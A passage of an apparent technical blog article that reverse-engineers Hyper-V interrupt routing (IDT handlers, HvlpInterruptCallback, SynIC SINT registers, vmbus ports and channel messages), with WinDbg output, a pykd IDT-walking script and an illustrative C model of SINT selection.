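    """The same walk inside WinDbg.  Assumption: pykd exposes the idtr/idtl
    pseudo-registers via pykd.reg(), memory via pykd.loadBytes() and symbol
    lookup via pykd.findSymbol()."""
    import pykd  # only importable inside a pykd-enabled WinDbg session
    base, limit = int(pykd.reg("idtr")), int(pykd.reg("idtl"))
    for gate, sym in walk_idt(lambda a, n: bytes(pykd.loadBytes(a, n)),
                              base, limit, pykd.findSymbol):
        print(f"isr {gate.vector:x} address = {sym}")


if __name__ == "__main__":
    for vector, sym in dump_sample_idt().items():
        print(f"isr {vector:x} address = {sym}")
```

<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Run stand-alone, the script prints the five "isr NN address = nt!..." lines for vectors 0x30-0x34 in the same format as the winload listing; under WinDbg, dump_live_idt() walks the real table from idtr/idtl. Keeping the memory reader and symbol resolver injectable is what makes the same parser usable both offline (for checking the decoding) and against a live kernel.</span></div>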
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Interestingly, Generation 2 virtual machines can only be created for operating systems whose kernel contains these five additional handlers. Intel provides a hardware feature for injecting interrupts, "virtual interrupt delivery", but Hyper-V does not use it to transfer control to these handlers. Instead, the hypervisor sets the bit corresponding to the vector number in a special memory area with the instruction lock bts [rcx+598h], rax, where rax holds the interrupt vector number (0x30-0x32). So perhaps the Hyper-V developers considered registering a vmbus!XPartPncIsr handler a less efficient solution than generating the interrupt through APIC virtualization from the data in the virtual SINTx registers.</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">These handlers are registered in the IDT even when the operating system runs outside the Hyper-V environment. Each handler calls HvlRouteInterrupt, passing an index as a parameter.</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><img height="106" src="https://lh3.googleusercontent.com/5f8QZea9j86y0W18QxhyPlW5j1IajYFmkWvVoMJXtI8niIgsoUvTNH5BS0TcNLCzYGtkAavBxH8ZWJ1W-Mq_QC_iYHzFuFmO-7VSYQSyrjwC3NXJ3pSUA9qx4I-s8M3o4Hi8OcNCWNX4hWin" style="-webkit-transform: rotate(0.00rad); border-image: none; border: currentColor; transform: rotate(0rad);" width="192" /></span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">HvlRouteInterrupt:</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;"><img height="171" src="https://lh5.googleusercontent.com/z6zL8RcHPL5dIV9JND9pzhWmlviOSfLGrnt5hPGjVoEjefmy74igb6IKo2REzOSt4rO5ah_nVj4_ujT-ALcAItrL5nKe8U05O1eBKYIdRy1vCMzeHdcMRO67DDQBalMJ3olGuxsPW4lJQZKJ" style="-webkit-transform: rotate(0.00rad); border-image: none; border: currentColor; transform: rotate(0rad);" width="200" /></span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">This function calls a handler from the HvlpInterruptCallback pointer array, selected by the index value. In the root OS the array looks as follows:</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">5: kd> dps HvlpInterruptCallback </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">fffff802`fff5cc30 fffff800`dc639d50 winhvr!WinHvOnInterrupt</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">fffff802`fff5cc38 fffff800`dd5a9ec0 vmbusr!XPartEnlightenedIsr</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">fffff802`fff5cc40 fffff800`dd5a9ec0 vmbusr!XPartEnlightenedIsr</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">fffff802`fff5cc48 fffff800`dd5a9ec0 vmbusr!XPartEnlightenedIsr</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">fffff802`fff5cc50 fffff800`dd5a9ec0 vmbusr!XPartEnlightenedIsr</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">fffff802`fff5cc58 00000000`00000000</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Depending on the index passed from KiVmbusInterruptX, XPartEnlightenedIsr queues one of two possible DPCs from the array of DPC structures in vmbusr: vmbusr!ParentInterruptDpc or vmbusr!ParentRingInterruptDpc:</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><img height="350" src="https://lh4.googleusercontent.com/YkoipD3NQOtFXoFKSVkEhJXIcUfi8HoSSyfrSdNOks3Q958FXBLlEwOBqXkwx8eCloTyMWM8VKgv1jB2SleW1HXA2VUHS4jfVPqBKi2DN2wjgch7QdCHVkQFCYEt8rjBS2geyTFAlYQ3lUOh" style="-webkit-transform: rotate(0.00rad); border-image: none; border: currentColor; transform: rotate(0rad);" width="437" /></span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><img alt="D:\Документы\Explore\Virtualization\Hyper-V\4ERNW\fromERNW\1.png" height="494" src="https://lh3.googleusercontent.com/JwttcDxcrQdjKTOW1zvGXyZ6-2BGcAnRvj621m0wE0laYi4Ji6MNq0toNAMfkVe1HUBB8rDyMHtsHdcbvDKHFZT_ooIJEmvXRU_KmsEG5tMyTwSqm2Y2hrH0wqjjbZDiIe4qar7ntVoiZMWx" style="-webkit-transform: rotate(0.00rad); border-image: none; border: currentColor; transform: rotate(0rad);" width="595" /></span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">The number of two-element DPC structures (one element for nt!KiVmbusInterrupt0, the second for nt!KiVmbusInterrupt1) in the array is determined by vmbusr!XPartPncPostInterruptsEnabledParent and depends on the number of logical processors in the root OS. A DPC with the deferred routines vmbusr!ParentInterruptDpc and vmbusr!ParentRingInterruptDpc is added for each logical processor. vmbusr!ParentRingInterruptDpc selects the address of the KDPC structure it passes to nt!KeInsertQueueDpc based on which processor is currently executing.</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">In a Windows guest OS, vmbus registers only one handler in the HvlpInterruptCallback array:</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">1: kd> dps HvlpInterruptCallback </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">fffff803`1d171c30 fffff800`6d7c5714 winhv!WinHvOnInterrupt</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">fffff803`1d171c38 fffff800`6d801360 vmbus!XPartEnlightenedIsr</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">fffff803`1d171c40 00000000`00000000</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">The HvlpInterruptCallback array is filled by nt!HvlRegisterInterruptCallback. The WinHvOnInterrupt handler is registered while winhvr.sys loads (winhvr!WinHvpInitialize -> winhvr!WinHvReportPresentHypervisor -> winhvr!WinHvpConnectToHypervisor -> nt!HvlRegisterInterruptCallback).</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">The remaining four handlers are registered by vmbusr.sys when the PnP manager loads it (vmbusr!RootDevicePrepareHardwareParent -> nt!HvlRegisterInterruptCallback).</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Let's try to understand how the hypervisor passes control to the interrupt handlers described above. For this we need the Virtual Interrupt Control section of the TLFS. In short, Hyper-V manages interrupts in the guest OS through a synthetic interrupt controller (SynIC), which extends the local APIC with an additional set of memory-mapped registers. Each virtual processor has its own SynIC in addition to the usual APIC. The SynIC has two pages: SIM (synthetic interrupt message page) and SIEF (synthetic interrupt event flags page). Both SIM and SIEF are arrays of 16 elements, each 256 bytes long. The physical address (more precisely, the guest physical address) of each page is held in the SIEFP and SIMP MSRs respectively, and since the pages are per virtual processor, their addresses differ for every logical CPU. The SynIC also defines 16 SINTx registers, and each element of SIM and SIEF corresponds to one SINTx register. WinDbg shows the contents of the SINTx registers with the !apic command (since WinDbg 6.3).</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Root OS:</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><img height="260" src="https://lh6.googleusercontent.com/MXkRBvZjILSVHSpsGgrEZpNNLIIXooDK1Xfp7TPf2YJ2zofHK3OBV7GNmJf1FbJuFXFeLuXlY3Qxvm5PXW__vNn09T4_kgrV2egWxfoW0D0M303NYYlQl-TRSnSovF5iiMQxsE8nQL8rz3-j" style="-webkit-transform: rotate(0.00rad); border-image: none; border: currentColor; transform: rotate(0rad);" width="374" /></span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Guest OS:</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><img height="207" src="https://lh6.googleusercontent.com/Em1kwQJL0uQic4b6OAuH8GI7wKYZ-xweE-GybYYoPBT3bGqpKRPvfKI-t1dPZm8KIDV3gvCwZYkU-pvuLQL9aehjwiESF8XJRuonnvmDIlRzm_cYEV-GLpxlNAPDEyIC-4OsfSHXmEKHQDgv" style="-webkit-transform: rotate(0.00rad); border-image: none; border: currentColor; transform: rotate(0rad);" width="356" /></span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 28.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">SINT0 and SINT1 are configured by nt!HvlEnlightenProcessor, which writes their parameters to MSRs 40000090h and 40000091h respectively. SINT4 and SINT5 are configured in vmbusr.sys (vmbusr!XPartPncPostInterruptsEnabledParent -> winhvr!WinHvSetSint -> winhvr!WinHvSetSintOnCurrentProcessor). In the guest OS, SINT2 is configured by vmbus.sys, which calls winhv!WinHvSetSintOnCurrentProcessor.</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Each SINTx register contains an 8-bit Vector field. It determines which interrupt routine receives control when a hypercall (HvSignalEvent, HvPostMessage) is executed with a PortID whose port is bound to that SINT.</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">The SINTx used for a message is fixed by its source: intercept messages are always delivered through SINT0 and placed in the first SIM slot, timer messages use the SINTx field of the corresponding STIMERx_CONFIG MSR, and messages or events for a port created with the HvCreatePort hypercall use the SINT recorded in the port's PortTypeInfo parameter. If the port type is HvPortTypeMessage or HvPortTypeEvent, PortTypeInfo contains TargetSint, the number of the SINT the port is bound to; its value can be from 1 to 15 (SINT0 is reserved for messages from the hypervisor and cannot be specified as TargetSint when a port is created).</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Analysis of the non-zero SINT values in the root OS shows that only 3 of the 5 interrupt routines are used (KiHvInterrupt, KiVmbusInterrupt0, KiVmbusInterrupt1). KiVmbusInterrupt2 and KiVmbusInterrupt3 may be needed on servers with a large number of logical processors (for example 64), but, unfortunately, this could not be verified in the test environment. The SINTx values also show that nt!KiHvInterrupt (vector 30) is called both for interrupts generated by the hypervisor itself and for ports created with TargetSint equal to 1.</span></div>
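<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">To make the routing rules above concrete, here is a small model of how the SynIC picks a SINT and an interrupt vector for an intercept message, a timer message or a port message, and how the Masked bit of a SINTx register suppresses the interrupt. This is an added example, not code from the article or from Hyper-V. The SINTx bit layout (bits 7:0 Vector, bit 16 Masked, bit 17 AutoEOI) and the STIMERx_CONFIG layout (bit 0 Enable, bits 19:16 SINTx) are taken from the TLFS; the sample register table is constructed, not a captured !apic dump, and the choice of 0x30 for the "vector 30" mentioned above and of 0x40/0x41 for the vmbusr SINTs is an assumption.</span></div>

```c
/* Model of SynIC SINT selection and vector delivery (TLFS, Virtual Interrupt
 * Control). Added example; not code from the article or from Hyper-V.
 * Assumed layouts: SINTx bits 7:0 = Vector, bit 16 = Masked, bit 17 = AutoEOI;
 * STIMERx_CONFIG bit 0 = Enable, bits 19:16 = SINTx. */
#include <stdint.h>
#include <stdbool.h>

#define HV_SYNIC_SINT_COUNT   16
#define HV_STIMER_COUNT       4
#define HV_SINT_VECTOR_MASK   0xFFull
#define HV_SINT_MASKED        (1ull << 16)   /* SINTx reset value is Masked=1 */
#define HV_SINT_AUTO_EOI      (1ull << 17)
#define HV_STIMER_ENABLE      (1ull << 0)
#define HV_STIMER_SINT_SHIFT  16
#define HV_STIMER_SINT_MASK   0xFull

/* Per-virtual-processor SynIC state that matters for routing */
typedef struct {
    uint64_t sint[HV_SYNIC_SINT_COUNT];        /* MSRs 0x40000090..0x4000009F */
    uint64_t stimer_config[HV_STIMER_COUNT];   /* STIMER0..3_CONFIG */
} synic_vp_t;

/* The three ways a SINT is chosen, as described in the text */
typedef enum { SRC_INTERCEPT, SRC_TIMER, SRC_PORT } synic_source_t;

typedef struct { unsigned vector; bool masked; bool auto_eoi; } sint_fields_t;

/* Split a raw SINTx MSR value into the fields !apic prints */
sint_fields_t synic_decode_sint(uint64_t value)
{
    sint_fields_t f;
    f.vector   = (unsigned)(value & HV_SINT_VECTOR_MASK);
    f.masked   = (value & HV_SINT_MASKED) != 0;
    f.auto_eoi = (value & HV_SINT_AUTO_EOI) != 0;
    return f;
}

/* SINT index the hypervisor will use for this source, or -1 if invalid.
 * arg = timer index for SRC_TIMER, TargetSint (from HvCreatePort's
 * PortTypeInfo) for SRC_PORT, ignored for SRC_INTERCEPT. */
int synic_select_sint(const synic_vp_t *vp, synic_source_t src, unsigned arg)
{
    switch (src) {
    case SRC_INTERCEPT:
        return 0;                                    /* always SINT0 */
    case SRC_TIMER:
        if (arg >= HV_STIMER_COUNT) return -1;
        if (!(vp->stimer_config[arg] & HV_STIMER_ENABLE)) return -1;
        return (int)((vp->stimer_config[arg] >> HV_STIMER_SINT_SHIFT) & HV_STIMER_SINT_MASK);
    case SRC_PORT:
        /* SINT0 is reserved for the hypervisor: TargetSint must be 1..15 */
        if (arg < 1 || arg >= HV_SYNIC_SINT_COUNT) return -1;
        return (int)arg;
    }
    return -1;
}

/* Vector injected for a SINT, or -1 when the SINT is masked: the message still
 * lands in the SIM/SIEF slot, but no interrupt is asserted. */
int synic_vector_for_sint(const synic_vp_t *vp, int sint)
{
    if (sint < 0 || sint >= HV_SYNIC_SINT_COUNT) return -1;
    sint_fields_t f = synic_decode_sint(vp->sint[sint]);
    return f.masked ? -1 : (int)f.vector;
}

/* Constructed root-OS-like table (assumption, not a captured dump):
 * SINT0/SINT1 -> 0x30, SINT2 -> 0x31 used by timer 0, SINT4 -> 0x40 with
 * AutoEOI, SINT5 -> 0x41 but masked, everything else at the reset value. */
synic_vp_t synic_sample_root_vp(void)
{
    synic_vp_t vp;
    for (int i = 0; i < HV_SYNIC_SINT_COUNT; i++) vp.sint[i] = HV_SINT_MASKED;
    for (int i = 0; i < HV_STIMER_COUNT; i++) vp.stimer_config[i] = 0;
    vp.sint[0] = 0x30;
    vp.sint[1] = 0x30;
    vp.sint[2] = 0x31;
    vp.sint[4] = 0x40 | HV_SINT_AUTO_EOI;
    vp.sint[5] = 0x41 | HV_SINT_MASKED;
    vp.stimer_config[0] = HV_STIMER_ENABLE | (2ull << HV_STIMER_SINT_SHIFT);
    return vp;
}
```

<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Call synic_select_sint with the source and then synic_vector_for_sint on the result: an intercept and a port with TargetSint 1 both end up on vector 0x30 in this table, which is the situation the text observes for nt!KiHvInterrupt, while a port bound to the masked SINT5 gets its slot written but no interrupt.</span></div>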
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">As an example, consider the parameters of the ports created when each of the Hyper-V integration services is activated in the guest.</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">The following table shows sample values of some parameters of the HvCreatePort hypercall:</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><img height="144" src="https://lh6.googleusercontent.com/6wxWUdzDtFr8DL3jZti85-cz9e7Fbvx5Y79DbbkT1LOt5CR1bPFHUSE3X6wBokT-HbGgMURSxdMle_HgQznjUy7Vc8zPbtGU6BeU4MYaAJ1tkZqYZt1sYyY5NaW43B-o3AAFaTRMO2xAaq1I" style="-webkit-transform: rotate(0.00rad); border-image: none; border: currentColor; transform: rotate(0rad);" width="519" /></span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">The root OS and the guest OS interact during Integration Services operation through the 5th element of the SIEF array, i.e. the handler called in the root OS is KiVmbusInterrupt1.</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Each newly created port receives the previous port number plus one. So if you disable all integration services and then re-enable them, the ports created for these services will be numbered from 0x22 to 0x27 (for the configuration shown in Figure 11; in other cases the port numbers will of course differ).</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">You can see the port settings either by connecting the debugger directly to the hypervisor and tracing the data passed to its HvCreatePort handler, or by connecting the kernel debugger and tracing the parameters of WinHvCreatePort in winhvr.sys.</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">The other ports are created when the guest OS is powered on (their number depends on the configuration of the guest operating system). The numbering below follows the order of creation for a virtual machine with the default hardware configuration in Windows Server 2012 R2.</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: center; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><img height="238" src="https://lh3.googleusercontent.com/tYUNkpt5i7vriNXUNAT-jmPh2ocz535y_BCWD6GMog2VV6kG8GHQ4xGWQp-KmDsz_itMOp1uU0DVLpq9PxDY_lXNkXb-g7YtqBMAQ2Ueh29yIvi5wXlcV5_MDNCGGx6jAeIWwrBA7ThxK-Gy" style="-webkit-transform: rotate(0.00rad); border-image: none; border: currentColor; transform: rotate(0rad);" width="276" /></span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">It is important to note that slot SIM0, in both the guest and the parent OS, is reserved for messages from the hypervisor. The format of those messages is documented in the TLFS. Data transferred through the remaining slots uses a different message format: vmbus messages are not documented, but the information needed to work with them is present in the LIS (Linux Integration Services) source code.</span></div>
<br /><br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Some information about vmbus message processing in vmbusr.sys:</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: center; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><img height="371" src="https://lh5.googleusercontent.com/UenI50omJVgFPcVmV1LKTS_KyJ4qn0lv-1QRlmaQy4QG_n49B7uxIv9xw3hiLSS8rRR-9MQ7HG0LttJN9QrVtz1fpOLEI5LPrne9PD_YFQLyC5NVcq-0Lw87Hsl0q1iZAcxJH5Ofcr4YgxbY" style="-webkit-transform: rotate(0.00rad); border-image: none; border: currentColor; transform: rotate(0rad);" width="517" /></span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">vmbusr!ChReceiveChannelMessage handles such messages in the root OS: it examines the contents of SIM slot 4 and determines the vmbus message code. If the code is 0 (CHANNELMSG_INVALID) or greater than 0x12, the function returns 0xC000000D (STATUS_INVALID_PARAMETER). Otherwise it processes the message sent by the guest or the root OS. For example, when the Guest Services component is enabled, the root OS sends CHANNELMSG_OFFERCHANNEL to the guest; the guest replies with CHANNELMSG_GPADL_HEADER; the root OS then sends CHANNELMSG_GPADL_CREATED, receives CHANNELMSG_OPENCHANNEL in return, and finally sends CHANNELMSG_OPENCHANNEL_RESULT to the guest with the result code of the channel creation. Note that before handling each valid message, ChReceiveChannelMessage validates it (ChpValidateMessage), in particular checking who the sender is (root OS or guest OS) and the minimum size of the message body.</span></div>
